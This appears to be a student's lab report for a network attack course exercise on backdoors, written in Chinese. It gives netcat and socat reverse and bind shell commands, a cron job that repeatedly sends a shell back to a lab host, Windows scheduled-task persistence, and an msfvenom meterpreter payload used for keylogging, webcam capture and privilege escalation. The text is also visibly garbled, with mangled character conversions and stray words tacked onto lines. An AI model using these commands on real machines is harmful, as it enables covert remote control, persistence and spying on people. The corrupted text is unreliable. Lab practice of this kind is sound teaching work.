2017-2018-2 20155203《網絡對抗技術》Exp2 後門原理與實踐

基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式?html

  • 經過下載帶後門的程序或者點開帶有後門的軟件,或者後門自己就在個人系統裏;

(2)例舉你知道的後門如何啓動起來(win及linux)的方式?linux

  • 能夠更改註冊表,隨系統啓動啓動

(3)Meterpreter有哪些給你映像深入的功能?shell

  • 擊鍵記錄,截取攝像頭

(4)如何發現本身有系統有沒有被安裝後門?vim

  • 靠殺毒軟件,作這個實驗的時候要先關閉殺毒軟件

實踐過程記錄

(1)使用netcat獲取主機操做Shell,cron啓動

  • 在kali虛擬機中輸入ifconfig,在WIN7虛擬機中輸入ipconfig,找到兩個虛擬機的ip地址(通常在同一網段),在VMware Station中打開虛擬機->設置
    ->網絡適配器->NAT模式能夠在沒有聯網的時候仍然ping通同一主機上的兩臺虛擬機。windows

  • kali端控制Win7端網絡

1. kali:nc -l -p 端口號
  2. Win7:ncat.exe -e cmd.exe kali主機ip 端口號//反向鏈接kali主機,端口號爲kali主機的端口號
  3. kali:能夠輸入Windows命令

  • Win7端控制kali端
1. Win7:ncat.exe -l -p 端口號
  2. Kali:nc kali主機ip 端口號 -e /bin/sh//反向鏈接Win7主機,端口號爲Win7主機的端口號

  • 經過ncat傳字符串
    一個主機開啓端口監聽,另外一個主機鏈接到這個端口,不用連接到cmd.exe或是shell能夠實現兩臺主機的數據傳輸
    tcp

  • 利用cron啓動獲取shell
    1. cron工具簡介:crontab指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供以後讀取和執行。咱們就是經過更改crontab中的文件內容(指令內容),使得被控主機反向鏈接控制端主機端口的指令能夠被週期性執行——悄悄進行。
    2. 具體實施方法:
-   Win7:ncat.exe -l -p 端口號
-   kali:crontab -e  //指令編輯一條定時任務
-   kali:選擇vim.basic
-   kali:時間(分) * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh//在最後一行添加,時間是指每一小時執行一次的分鐘數,按照本身的kali虛擬機的時間設定,否則可能要等好久才能獲得shell
-   Win7:獲得shell執行linux指令

(2)使用socat獲取主機操做Shell, 任務計劃啓動

  • socat的使用方法:
    socat是ncat的加強版,它使用的格式是socat [options] address address
    ,其中兩個address是必選項,而options 是可選項。socat時kali虛擬機中自己就有的,Win7須要下載使用。
- 打開Win7虛擬機中的控制面板,選擇查看方式爲:大圖標;找到:管理工具,打開;找到:任務計劃程序,打開;
- 在右側一欄中選擇:建立任務,打開;
- 填寫任務名稱;新建觸發器,選擇開始任務時間爲:工做站鎖定時,便於操做;
- 新建操做,選擇啓動的程序爲socat.exe,參數填爲:tcp-listen:端口號 exec:cmd.exe,pty,stderr,這一操做的含義是把cmd.exe綁定到端口號,同時把cmd.exe的stderr重定向到stdout上
- 用快捷鍵Windows+L鎖定虛擬機,任務啓動
- 在kali虛擬機終端輸入socat - tcp:192.168.1.200:端口號,能夠控制Win7的cmd。

(3)使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  • 首先要在kali裏生成一個可執行文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.144 LPORT=5203 -f exe > dkx20155203_backdoor.exe注意這裏的地址是發起攻擊主機的地址,也就是kali的地址,生成文件後,會有文件大小的相關說明。
  • 傳輸這個文件,方法和傳字符串相同,命令以下:(有前後順序,接收方要先意識到要接收文件了)
1.   Win7:ncat.exe -l > dkx20155203_backdoor.exe
  2.   kali:nc 192.168.230.141 5203 < dkx_20155203_backdoor.exe//這裏的地址是Win7的地址

接收到要檢查文件大小,不幸運的時候有多是0KB,後面就什麼也幹不了。工具

  • 在kali端使用msfconsole指令進入msf控制檯,設置LPORT、LHOST軍與生成可執行文件相同,設置payload。執行exploit
  • 在win7端運行以前傳輸過去的程序。
  • 攻擊成功~

(4)使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

如圖所示:
.net

若是鏈接攝像頭出錯,切換到WIN7虛擬機(VMware Station)點擊虛擬機->可移動設備->xxx Camera->鏈接
3d

這個擊鍵記錄頗有趣,由於若是我是複製的它也記錄不了,懶人無敵~

  • getsystem提高特權的時候出錯,如圖:

解決辦法:

特權提高

另外一個特權提高

試了五六次,成功了!

(5)可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell(1分)加份內容一併寫入本實驗報告。


實驗總結與體會

有趣的實驗體驗

相關文章
相關標籤/搜索